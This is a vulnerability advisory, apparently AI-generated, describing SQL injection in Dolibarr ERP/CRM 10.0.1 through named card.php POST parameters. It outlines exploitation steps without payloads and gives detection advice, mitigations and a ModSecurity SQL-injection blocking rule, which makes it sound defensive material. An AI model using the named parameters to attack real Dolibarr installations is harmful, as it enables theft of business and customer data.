CVE-2019-25450 Overview
CVE-2019-25450 is a SQL Injection vulnerability affecting Dolibarr ERP/CRM version 10.0.1. The application contains multiple SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries by injecting SQL code through POST parameters. Attackers can inject malicious SQL through parameters like actioncode, demand_reason_id, and availability_id in card.php endpoints to extract sensitive database information using boolean-based blind, error-based, and time-based blind techniques.
Critical Impact
Authenticated attackers can extract sensitive database information, potentially compromising confidential business data, customer records, financial information, and user credentials stored within the Dolibarr ERP/CRM system.
Affected Products
- Dolibarr ERP/CRM version 10.0.1
- Dolibarr card.php endpoint components
Discovery Timeline
- 2026-02-22 - CVE-2019-25450 published to NVD
- 2026-02-25 - Last updated in NVD database
Technical Details for CVE-2019-25450
Vulnerability Analysis
This vulnerability stems from insufficient input validation and sanitization of user-supplied POST parameters in the Dolibarr ERP/CRM application. The affected card.php endpoints fail to properly validate or parameterize user input before incorporating it into SQL queries, creating opportunities for SQL injection attacks.
The vulnerability can be exploited through multiple injection techniques:
- Boolean-based blind SQL injection: Attackers can infer database content by observing differences in application responses based on true/false conditions injected into queries.
- Error-based SQL injection: By crafting payloads that trigger database errors, attackers can extract data through error messages returned by the application.
- Time-based blind SQL injection: Attackers can use database delay functions to infer information based on response timing differences.
The attack requires authentication, meaning the attacker must have valid credentials to access the vulnerable endpoints. However, once authenticated, even low-privileged users may be able to extract sensitive data from the entire database.
Root Cause
The root cause is improper input validation (CWE-89: Improper Neutralization of Special Elements used in an SQL Command). The application directly incorporates user-controlled POST parameters (actioncode, demand_reason_id, availability_id) into SQL queries without proper sanitization, escaping, or use of parameterized queries/prepared statements.
Attack Vector
The attack is network-based, requiring the attacker to send specially crafted HTTP POST requests to the vulnerable card.php endpoints. The attacker must first authenticate to the Dolibarr application with valid credentials. Once authenticated, the attacker can inject SQL payloads through the vulnerable POST parameters to manipulate database queries and extract sensitive information.
The exploitation process involves:
- Authentication to the Dolibarr ERP/CRM application
- Identification of vulnerable card.php endpoints
- Injection of SQL payloads through POST parameters such as actioncode, demand_reason_id, or availability_id
- Extraction of database information using blind or error-based techniques
For technical details and proof-of-concept information, see the Exploit-DB #47370 advisory.
Detection Methods for CVE-2019-25450
Indicators of Compromise
- Unusual SQL syntax or special characters in HTTP POST request parameters targeting card.php endpoints
- Database error messages appearing in application logs or responses
- Abnormal database query patterns or slow queries indicative of time-based injection attempts
- Unexpected data access patterns from authenticated user accounts
Detection Strategies
- Monitor web application firewall (WAF) logs for SQL injection signatures in POST parameters
- Implement database activity monitoring to detect unusual query patterns or unauthorized data access
- Review application logs for repeated requests to card.php with varying parameter values
- Configure intrusion detection systems (IDS) to alert on SQL injection attack patterns
Monitoring Recommendations
- Enable detailed logging for all requests to card.php endpoints
- Implement database audit logging to track query execution and data access
- Set up alerting for database errors that may indicate injection attempts
- Monitor authenticated user sessions for suspicious activity patterns
How to Mitigate CVE-2019-25450
Immediate Actions Required
- Upgrade Dolibarr ERP/CRM to the latest stable version that addresses this vulnerability
- Implement input validation and parameterized queries at the application level
- Deploy a web application firewall (WAF) with SQL injection protection rules
- Review and restrict database user privileges to limit potential impact
- Audit user accounts with access to the affected functionality
Patch Information
Organizations should upgrade to a patched version of Dolibarr ERP/CRM. Refer to the VulnCheck Advisory for specific remediation guidance and patch information.
Workarounds
- Restrict network access to the Dolibarr application to trusted IP addresses only
- Implement additional authentication controls such as multi-factor authentication
- Use a web application firewall to filter malicious SQL injection payloads
- Disable or restrict access to vulnerable card.php endpoints if not business-critical
# Example WAF rule to block SQL injection attempts (ModSecurity)
SecRule ARGS "@detectSQLi" \
"id:1001,\
phase:2,\
block,\
msg:'SQL Injection Attack Detected',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
severity:'CRITICAL'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
